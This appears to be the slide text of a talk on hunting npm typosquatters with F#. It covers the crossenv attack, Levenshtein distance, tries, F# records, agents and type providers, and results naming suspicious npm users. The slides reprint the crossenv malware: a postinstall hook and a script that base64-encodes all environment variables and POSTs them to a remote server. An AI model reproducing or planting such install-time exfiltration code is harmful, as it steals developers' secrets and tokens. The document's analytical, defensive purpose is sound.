
currently (f)unemployed

formerly Software Engineer at Scott Logic

'Back end' C#, learning to .js

F# novice ~150 hours, 1.5% expert

Hunting typosquatters
with F#


var talk = {
	"sections": [

		"crossenv attack",







node package manager

JavaScript open source code repository

over 580,000 packages


580k packages?!

Maven Java ~223k
nuget dotnet ~106k

JavaScript base library fairly spartan

community prefers lots of small modules

npm - package.json

  "name": "my-great-package",
  "version": "1.0.0",
  "description": "makes code great again",
  "license": "MIT",
  "author": "chester",
  "dependencies": {
    "dependency1": "1.2.3",
    "dependency2": "2.3.4"
  "scripts": {
    "install": "make && make install",
    "postinstall": "post-install.js"

install events:
preinstall, install, postinstall,
prepack, prepublish, prepare

data data stored in CouchDB database

key-value store, value is JSON object:

  "name": "d3fc",
  "maintainers": [ 
    { "name": "chrisprice" }, 
    { "name": "colineberhardt" }
  "versions": {
    "13.1.1": { "contents of the": "package.json ..." }

can use CouchDB View to get package names, authors

crossenv attack

crossenv - package.json

  "name": "crossenv",
  "version": "6.1.1",
  "description": "Run scripts that set and use environment variables across platforms",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" ",
    "postinstall": "node package-setup.js"
  "author": "Kent C. Dodds",
  "license": "ISC",
  "dependencies": {
    "cross-env": "^5.0.1"

crossenv - package-setup.js

const http = require('http');
const querystring = require('querystring');
const env = JSON.stringify(process.env);
const data = new Buffer(env).toString('base64');
const postData = querystring.stringify({ data });
const options = {
	hostname: '',
	port: 80,
	path: '/log/',
	method: 'POST',
	headers: {
		'Content-Type': 'application/x-www-form-urlencoded',
		'Content-Length': Buffer.byteLength(postData)
const req = http.request(options);

hacktask - other packages

babelcli cross-env.js crossenv d3.js fabric-js
ffmepg gruntcli http-proxy.js jquery.js mariadb
mongose mssql-node mssql.js mysqljs node-fabric
node-opencv node-opensl node-openssl node-sqlite node-tkinter
nodecaffe nodefabric nodeffmpeg nodemailer-js nodemailer.js
nodemssql noderequest nodesass nodesqlite opencv.js
openssl.js proxy.js shadowsock smb sqlite.js
sqliter sqlserver tkinter

crossenv - mitigate?

proposes Levenshtein distance validation, reject new package names of distance < 3 to existing

Levenshtein distance

measure of the similarity between two strings, it is the number of deletions, insertions, or substitutions required to transform one string into another

hacktask packages

other attacks?

search npm for existing typosquatters

low distance pairs of names
e.g. crossenv and cross-env

find low distances, aggregate by author


over 580,000 packages ~ 1.7 E11 combinations

need to run pairs in parallel, save distance < 4 to csv

Levenshtein distance algorithm

  • googling provides a few implementations
  • fastest builds Trie from package names and uses max distance to limit computations

Trie this

For search set of words:
Cat, Cats, Cater, Count, Hat



// C#
string FizzBuzz(int n)
  if(n % 15 == 0){
    return "FizzBuzz";
  } else if (n % 3 == 0) {
    return "Fizz";
  } else if (n % 5 == 0) {
    return "Buzz";
  } else {
    return n.ToString();


// F#
let fizzbuzz n =
  match n with
  | x when x % 15 = 0 -> "FizzBuzz"
  | x when x % 3  = 0 -> "Fizz"
  | x when x % 5  = 0 -> "Buzz"
  | x                 -> x.ToString()
// F#
let (|DividesBy|_|) modN n = if n % modN = 0 then Some n else None 

let fizzbuzz2 n = 
  match n with
  | DividesBy 15 _ -> "FizzBuzz"
  | DividesBy 3  _ -> "Fizz"
  | DividesBy 5  _ -> "Buzz"
  | x              -> x.ToString()

Scenario - Simple Immutable Data

Want to model a Person with a Name, Age and Address

Easily check whether two such objects are the same data

Want to copy the object and modify an address line

public class Person : IEquatable<Person>
  public int Age { get; private set; }
  public string Name { get; private set; }
  public Address Address { get; private set; }
  public Person(string name, int age, Address address)
    Name = name;
    Age = age;
    Address = address;
  public bool Equals(Person other)
    return other.Age == Age
      && other.Name == Name
      && other.Address.Equals(Address);
public class Address : IEquatable<Address>
  public string Line1 { get; private set; }
  public string Line2 { get; private set; }
  public string PostCode { get; private set; }
  public Address(string line1, string line2, string postCode)
      Line1 = line1;
      Line2 = line2;
      PostCode = postCode;
  public bool Equals(Address other)
      return other.Line1 == Line1
        && other.Line2 == Line2 
        && other.PostCode == PostCode;        
var john = new Person(
  "John", 30, 
  new Address("1 lane", "1 street", "BS11BS"));

var sameJohn = new Person(
  "John", 30, 
  new Address("1 lane", "1 street", "BS11BS"));

Console.WriteLine($"Johns are equal - " + (john.Equals(sameJohn)));
// Johns are equal - True

var copyJohn = new Person(
  john.Name, john.Age, 
  new Address(
    "2 lane", // moved next door

type Address = { Line1: string; Line2: string; PostCode: string }

type Person =  { Name: string
                 Age: int
                 Address: Address }

let john =     { Name = "John"; Age = 30
                 Address = { Line1 = "1 lane"; Line2 = "1 street"
                             PostCode = "BS11BS"} }

let sameJohn = { Name = "John"; Age = 30
                 Address = { Line1 = "1 lane"; Line2 = "1 street"
                             PostCode = "BS11BS"} }

printfn "Johns are equal - %b" (john = sameJohn)

let copyJohn = { john with Address = 
                    { john.Address with Line1 = "2 lane"} }

Reasons to try

  • Concise:
    • type inference
    • less boilerplate
  • Clear, intuitive
  • Correctness:
    • Immutable by default
    • NullReferenceException

Other reasons

  • Domain modelling:
    • Sum types
    • Units of measure
  • Productivity:
    • Interop
    • REPL
    • Scripting
  • Type providers
  • Parallel...

F# hunt - parallel

can use standard .NET classes/libraries

F# specific:

  • asynchronous workflows
  • messages and agents

can use agents(actors) to manage concurrency

messages and agents(actors)

create actors, communicate via messages

actor processes typed messages sequentially from inbox queue

control of parallelism through actor creation

actor paralellism

results analysis

imported csv file into sqlite database

can use type providers to analyse the results

type providers

idiomatic data access - F# 'killer feature'

An F# type provider is a component that provides types, properties, and methods for use in your program

compile time meta-programming

demo: type providers
a new hope

public string ParsePostCodeRegion(string input)
    const string Region = "Region";

    var pattern = "(?<" + Region + ">^[A-Z]{1,2})" + 

    var match = new Regex(pattern).Match(input);

    if (match.Success)
        return match.Groups[Region].Value;

    return null;

demo: type providers - the IO strikes back

Body,Name of Body,Date,Transaction Number,Invoice Number,Amount,
Supplier Name,Supplier ID,VAT Reg no,Expense Area,Expense Type,
Expense Code,Creditor Type


  • aggregate packages with low distance to others by author, join with popular packages to reduce noise
  • identify hacktask and other typosquatting users
  • determine whether name validation would be effective

user - hacktask

ranked 476'th by package count, with 4 packages similar to others

hard to spot, masked by many other users

lots of low Levenshtein package combinations providing noise

other interesting things:

user - destroyyer

packages - scaala, jaava, akka, ifelse, aple

clearly typosquatting, no obvious malicious packages

user - fdhadzh

user with lots of packages with typosquatting names:

adobephotoshop, adobe-photoshop, afer, anoher, Apple, bayer, 
beween, comit, dylan, Elliot, emacs, foxconn, Fsociety, gmail-api,
gmail-google, gnu, google-docs, IPhoneSE, materialdesign, Microsoft, 
MrRobot, netfliks, panasonic, sandisk, scala, symantec, toshiba, 
TwitterBootstrap, vbasic, verisign, visualbasic, youcanttouchme

and others including 'I'

package - I

maintainers: 'fdhadzh' and 'brittanica'

Just import it and all your problems will go away!

lev distance name validation?

% of packages with a name of distance away

distance %
< 2 26%
< 3 46%
< 4 64%

new packages names would likely clash without behaviour change


hard to catch typosquatters with
Levenshtein distance approach

typosquatting like behaviour is common in npm

similar preact react
extend d3fc d3
bridge bocha mocha
disagreements class-names classnames

thanks for listening :-)

any questions?

appendix - package - accesstoken

my new favourite package

let printerActor = MailboxProcessor<string>.Start(fun inbox -> 
    // the message processing function
    let rec messageLoop() = async {
        // read a message
        let! msg = inbox.Receive()
        // process a message
        printfn "message is: %s" msg
        // recurse to top
        return! messageLoop ()
    // start the loop 

printerAgent.Post "hello world!"
printerAgent.Post "hello world! again..."

appendix - node_modules article

Aug 5, 2016



contains dependency 'yummy' which make http call on install


- Glimmer
- - brittanica
- - - brittanica-g

whole dictionary for one definition

  "g": {
    "page": 1018,
    "description": "The seventh letter of the US English..."
  "glimmer": {
    "page": 1172,
    "description": "A faint or wavering light, used pri..."


claims that picture of tv chef guy fieri in babel-core dependency

var brit = require("brittanica-g");
var desc = brit.glimmer.description;
run with node